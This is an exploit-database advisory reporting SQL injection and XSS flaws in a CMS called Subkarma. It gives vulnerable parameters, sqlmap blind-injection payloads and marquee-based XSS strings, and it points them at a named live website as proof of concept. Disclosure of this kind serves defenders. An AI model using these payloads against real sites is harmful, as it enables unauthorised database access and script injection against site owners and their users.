CMS Subkarma Cross Site Scripting / SQL Injection

2014.10.14
Credit: Renzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-89

# Multiple SQL Injection & XSS on CMS SUBKARMA # Risk: High # CWE number: CWE-89,CWE-79 # Date: 13/10/2014 # Vendor: www.jttel.com.tw # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906 # Vulnerables File: news.php ; product.php ; pro_con.php # Exploits: http://www.target.com/news.php?id=[XSS] http://www.target.com/product.php?cat_id=[SQLI] & [XSS] http://www.target.com/pro_con.php?id=[SQLI] & [XSS] # PoC: http://www.cideko.com/product.php?cat_id=18 http://www.cideko.com/pro_con.php?id=3 --- "SQLI using SQLMAP."--- Place: GET Parameter: cat_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat_id=18 AND 6427=6427 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e)) --- --- " XSS using HTML injection."--- http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee> http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee> http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee> # Note The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan. Reference, http://cxsecurity.com/issue/WLB-2011020004 . # Thank's


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top